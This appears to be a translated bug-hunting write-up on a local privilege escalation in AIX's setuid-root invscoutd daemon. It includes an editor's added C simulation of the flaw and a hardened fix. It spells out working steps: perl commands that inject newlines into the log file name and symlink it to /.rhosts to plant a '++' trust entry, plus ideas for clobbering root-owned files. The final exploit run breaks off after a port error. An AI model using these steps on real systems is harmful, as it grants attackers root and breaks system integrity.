Found a bug? Bug hunting in AIX -- invscoutd

Source: Internet
Author: User
Platform information:
-bash-2.05b$ oslevel
5.1.0.0
-bash-2.05b$ oslevel -r
5100-01
  
First, check the permissions on the invscoutd binary. It is setuid root (the s in the owner's execute position):
-bash-2.05b$ ls -l /usr/sbin/invscoutd
-r-sr-xr-x   1 root     system     217868 Aug 03 2001 /usr/sbin/invscoutd
  
-bash-2.05b$ man invscoutd
............
The invscoutd command implements a permanent Inventory Scout server daemon on
one machine in a user's local network. The usual client is a Java applet running
in the user's Web browser, which was downloaded from a central Inventory Scout
CGI application.
............
  
Let's see what the command does when run with no arguments:
-bash-2.05b$ invscoutd
invscoutd: Missing log file name.
Inventory Scout Daemon 2.0.2.
USAGE: invscoutd [options] logfile                               <-- the log file is a command-line argument
   logfile  Append status and err msgs. '-' means write to stderr.
   -o       Overwrite preexisting log file instead of append.   <-- can clobber an existing file
   -pN      Change port number to N from default 808.           <-- the default listening port is 808
   -bN      Change read buffer size to N from default 1024.
   -dN      Change max logic db file size to N from default 50000.
   -tN      Change timeout period to N seconds from default 30 seconds.
   -vN      Change verbosity level to N from default 18.        <-- log verbosity; the higher the level, the more is recorded
            25=max 20=debug 18=calls 15=banner 10=errs 5=fatal 0=none.
  
I vaguely remember that quite a few old Unix vulnerabilities came from setuid programs handling their log files carelessly (creating or writing them with root's privileges). So let's look at this log file first.
  
  
-bash-2.05b$ ls -l /tmp/bb
ls: 0653-341 The file /tmp/bb does not exist.

-bash-2.05b$ invscoutd /tmp/bb
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Start invscoutd 2.0.2:
p=808 u=0 v=18 t=30 d=50000 pid=17028
flog=/tmp/bb
-bash-2.05b$ ls -l /tmp/bb
-rw-r--r--   1 root     staff     270 May 03 /tmp/bb

Look at that: the log file was created owned by root, even though we started the daemon as an ordinary user!

-bash-2.05b$ id
uid=203(cloud) gid=1(staff)
  
So it is a vulnerability: a setuid-root program creates a file at a path of our choosing, as root. What can we do with it??
Think......

At the very least we can trash important system configuration files by naming one of them as the log file. Haha......

Better: think about important files that do not yet exist, such as /.rhosts (assume for now that it is absent). We can use the bug to create it, and if we run umask 000 beforehand, the file is created world-writable, so we can edit it ourselves afterwards. ^_^

We could then put whatever we like in /.rhosts, for example the line
++
(the classic "+ +" any-host, any-user entry; the space may have been lost in this transcription).
  
Unfortunately, the r-services check the attributes of .rhosts before honouring it:
if the file is not owned by the corresponding user, or it grants write access to users other than the owner, the check fails and the file is ignored!

So creating a writable /.rhosts to get root does not work ~~
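The ownership and mode test that the r-services apply, as an added example (my code, written for this page; it is neither the article's nor the actual AIX rlogind/rshd source). The exact rule implemented here is the BSD ruserok() convention (owner must be the user or root, and no group or world write bit may be set) and is assumed to be what AIX does; the article only says that such a check exists. The function names and the scratch file path are invented.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Would an r-service honour a .rhosts file with this owner and mode for the
 * account user_uid?  Rule assumed here (BSD ruserok() style, an assumption
 * for AIX): owner must be the user or root; no group/other write bit. */
int rhosts_acceptable(uid_t file_uid, mode_t file_mode, uid_t user_uid)
{
    if (file_uid != 0 && file_uid != user_uid)
        return 0;                           /* wrong owner */
    if (file_mode & (S_IWGRP | S_IWOTH))
        return 0;                           /* someone else could edit it */
    return 1;
}

/* The same check against a real file on disk. */
int rhosts_path_acceptable(const char *path, uid_t user_uid)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    return rhosts_acceptable(st.st_uid, st.st_mode, user_uid);
}

/* Reproduce the article's "umask 000" idea in a scratch file: a .rhosts that
 * is mode 0666 is rejected no matter who owns it.  Returns the check result
 * (0 = rejected), or -1 if the scratch file could not be created. */
int demo_umask000_file(void)
{
    char path[] = "/tmp/rhostsXXXXXX";      /* invented scratch path */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    fchmod(fd, 0666);                       /* what umask 000 would have left */
    close(fd);
    int ok = rhosts_path_acceptable(path, getuid());
    unlink(path);
    return ok;
}

int main(void)
{
    printf("root-owned 0666 .rhosts for uid 203 accepted? %d\n",
           rhosts_acceptable(0, 0100666, 203));
    printf("scratch 0666 file accepted? %d\n", demo_umask000_file());
    return 0;
}
```

The first call is exactly the situation the umask 000 trick produces (root-owned, world-writable) and is rejected on the mode test alone, which is why that idea goes nowhere even though the file was created successfully.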
  
We could also clobber existing files such as /etc/passwd (the daemon opens them as root), but that gains nothing: we cannot change their permissions, and we do not choose what gets written ~~

Back to the drawing board. What we actually want is to control the content that gets written. We cannot obtain write permission on the target file directly, but the log is written as root, so if we can control what goes into the log and make the log file be /.rhosts, /etc/passwd or /var/spool/cron/crontabs/root, we indirectly control a line in a root-owned file.
  
Let's see what is written to the log file:
-bash-2.05b$ cat /tmp/bb
2003/05/03 03:54:37 G16716: invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
2003/05/03 03:54:37 G16716: invscoutd_2.0.2 Logic Database Version 1.3.0.0
2003/05/03 03:54:37 P17028: invscoutd_2.0.2 Start invscoutd 2.0.2:
p=808 u=0 v=18 t=30 d=50000 pid=17028
flog=/tmp/bb

The line flog=/tmp/bb echoes our input, the log file name, verbatim.
  
Let's try again to see whether the problem reproduces.

-bash-2.05b$ invscoutd ./aa
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Exit code 2, pid 536968056.

The old instance is still running (and still holds port 808), so it has to be killed before trying again.

-bash-2.05b$ ps -ef | grep invs
   cloud 15526     1   0 04:36:25  pts/0  invscoutd ./aa
   cloud 16068 16836   1 04:37:50  pts/0  grep invs
-bash-2.05b$ kill -9 15526

Did the failed start still write the log file?
-bash-2.05b$ ls -l ./aa
ls: 0653-341 The file ./aa does not exist.

No.


Once more; I have to reproduce it before I can relax.
-bash-2.05b$ invscoutd ./aa
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Start invscoutd 2.0.2:
p=808 u=0 v=18 t=30 d=50000 pid=15526
flog=./aa

-bash-2.05b$ ls -l ./aa
ls: 0653-341 The file ./aa does not exist.
Why wasn't it written? Does the file name have to start with a slash? (Most likely a daemon changes its working directory when it detaches, so a relative path is created somewhere other than where we are looking.) Whatever the reason, write to /tmp and try again.

This time I remembered to kill the process first.
-bash-2.05b$ ps -ef | grep invsc
   cloud 14194 15338   3 03:55:29  pts/0  grep invsc
   cloud 17028     1   0 03:54:37  pts/0  invscoutd ./aa
-bash-2.05b$ kill -9 17028

............

After testing, it reproduces reliably. Now we can relax ~~
  
Now think about rewriting .rhosts, passwd or the crontab: to break through and get root we must completely control at least one line of the file that gets written. What we control in the log is the "flog=<input file name>" part, and a line break embedded in the file name lets us control a whole line, with a file name like "aaaa\n<our complete line>\naaaa".

But how do you type a \n on the command line and pass it as an argument? The Perl I learned earlier comes in handy ^_*: use perl to run invscoutd with the argument "/tmp/bbbbb\n++\nddd" and check whether a log line consisting of exactly ++ appears.
  
-bash-2.05b$ perl -e 'system "invscoutd", "/tmp/bbbbb\n++\nddd";'
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Start invscoutd 2.0.2:
p=808 u=0 v=18 t=30 d=50000 pid=16282
flog=/tmp/bbbbb
++
ddd
-bash-2.05b$ cat /tmp/bbbbb*
2003/05/03 03:59:09 G14204: invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
2003/05/03 03:59:09 G14204: invscoutd_2.0.2 Logic Database Version 1.3.0.0
03:59:09 G14204: invscoutd_2.0.2 Bind error, port 808: The socket name is already in use.
03:59:09 G14204: invscoutd_2.0.2 Exit code 2, pid 536968072.
2003/05/03 03:59:27 G14934: invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
2003/05/03 03:59:27 G14934: invscoutd_2.0.2 Logic Database Version 1.3.0.0
2003/05/03 03:59:27 P16282: invscoutd_2.0.2 Start invscoutd 2.0.2:
p=808 u=0 v=18 t=30 d=50000 pid=16282
flog=/tmp/bbbbb
++
ddd

It works: the log contains a line with nothing but ++ on it!! (The first attempt failed with the bind error because the previous instance was still on port 808; note that the error itself was logged, and the "Exit code 2" seen earlier is that bind error.)

-bash-2.05b$ ls -l /tmp/bbbbb*
-rw-r--r--   1 root     staff     602 May 03 /tmp/bbbbb
++
ddd

(The file name itself contains the two newlines, which is why ls prints it over three lines.)
  
So how do we get "\n++\n" into /.rhosts?


Think......

Think about it......

Oh, I've got it. Have you?

Here's another 5 minutes. Think about it ~~

Running invscoutd /.rhosts directly
certainly will not do: the file will not contain the
++
line we want.

Running perl -e 'system "invscoutd", "/tmp/bbbbb\n++\nddd";'
writes the
++
line successfully,

but the file written is "/tmp/bbbbb\n++\nddd", and we want it written into /.rhosts............

To sum up, the core of the problem is: write the file name of A into file B. The symbolic link in Unix is the bridge ~

Create a symbolic link from A to B:
ln -s B A
then run
invscoutd A
and it should work.
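The two ingredients of the plan above, the newline embedded in the log file name (from the /tmp/bbbbb test) and the symlink A -> B, simulated in C as an added example. This is my code, not invscoutd's source and not the article's: vuln_log_start stands in for what the setuid daemon appears to do (open the caller's path with root's privileges, follow symlinks, echo the path into the file body), safe_log_start is one hardened version of the same open, and all file, directory and function names are invented. It runs unprivileged in a scratch directory, with a plain file standing in for /.rhosts.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Reject a log path that could break a log line or land in an unexpected
 * directory.  The daemon echoes the path verbatim as "flog=<path>", so any
 * byte that ends a line (or any other control byte) is an injection point. */
int log_path_ok(const char *path)
{
    if (path == NULL || path[0] != '/')      /* relative paths follow the daemon's cwd */
        return 0;
    for (const unsigned char *p = (const unsigned char *)path; *p; p++)
        if (*p < 0x20 || *p == 0x7f)
            return 0;
    return 1;
}

/* Vulnerable pattern (stand-in for the setuid daemon): open the caller's path
 * with the effective uid's privileges, follow symlinks, echo the path. */
int vuln_log_start(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
    if (fd < 0)
        return -1;
    dprintf(fd, "Start invscoutd:\nflog=%s\n", path);
    close(fd);
    return 0;
}

/* Hardened: validate the path, drop to the real uid so the kernel checks the
 * caller's permissions rather than root's, and never follow a symlink in the
 * final component.  (Dropping privilege is a no-op when run unprivileged.) */
int safe_log_start(const char *path)
{
    if (!log_path_ok(path))
        return -1;
    if (geteuid() != getuid() && seteuid(getuid()) != 0)
        return -1;
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    dprintf(fd, "Start invscoutd:\nflog=%s\n", path);
    close(fd);
    return 0;
}

/* True if `file` contains a line that is exactly `line`. */
static int file_has_line(const char *file, const char *line)
{
    FILE *f = fopen(file, "r");
    if (f == NULL)
        return 0;
    char buf[512];
    int found = 0;
    while (!found && fgets(buf, sizeof buf, f) != NULL) {
        buf[strcspn(buf, "\n")] = '\0';
        found = strcmp(buf, line) == 0;
    }
    fclose(f);
    return found;
}

/* Re-run the article's plan in a scratch directory: B stands in for /.rhosts,
 * A is a symlink to B whose basename is `link_name` (e.g. "cc\n++\ndd"), and the
 * chosen logger is started with A as its log file.  Returns 1 if B then
 * contains a line equal to `wanted`, 0 if not, -1 if setup failed. */
int demo(int hardened, const char *link_name, const char *wanted)
{
    const char *tmp = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    char dir[256], target[512], link[512];
    snprintf(dir, sizeof dir, "%s/invsXXXXXX", tmp);
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/rhosts", dir);           /* B */
    snprintf(link, sizeof link, "%s/%s", dir, link_name);        /* A */
    int fd = open(target, O_WRONLY | O_CREAT, 0600);
    if (fd >= 0)
        close(fd);
    if (fd < 0 || symlink(target, link) != 0) {
        unlink(target);
        rmdir(dir);
        return -1;
    }
    (void)(hardened ? safe_log_start(link) : vuln_log_start(link));
    int got = file_has_line(target, wanted);
    unlink(link);
    unlink(target);
    rmdir(dir);
    return got;
}

int main(void)
{
    printf("vulnerable logger, A = cc\\n++\\ndd -> B: B got a '++' line? %d\n",
           demo(0, "cc\n++\ndd", "++"));
    printf("hardened  logger, same A: B got a '++' line? %d\n",
           demo(1, "cc\n++\ndd", "++"));
    return 0;
}
```

Two defences are exercised separately: with the newline-bearing name the hardened logger never reaches open() because log_path_ok rejects the path, and with an innocent symlink name it is O_NOFOLLOW that refuses to write through to B. Neither replaces the real fix for a setuid daemon, which is to not create or open caller-named files with root's privileges at all.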
  
Start action:
  
-bash-2.05b$ ls -l /.rhosts
ls: 0653-341 The file /.rhosts does not exist.

Create the A -> B symbolic link:
-bash-2.05b$ perl -e 'symlink "/.rhosts", "/tmp/cc\n++\ndd";'
Here B is "/.rhosts"
and A is "/tmp/cc\n++\ndd"

-bash-2.05b$ ls -l /tmp/cc*
lrwxrwxrwx   1 cloud    staff      8 May 03 04:02 /tmp/cc
++
dd -> /.rhosts

Now run it:

-bash-2.05b$ perl -e 'system "invscoutd", "/tmp/cc\n++\ndd";'
Inventory Scout Version 1.3.0.0
Logic Database Version 1.3.0.0
Exit code 2, pid 536968072.
(Exit code 2 again: as the earlier log showed, this is the bind error on port 808, so the instance from the previous test is still running and must be killed before this run can be retried.)
-Bash-
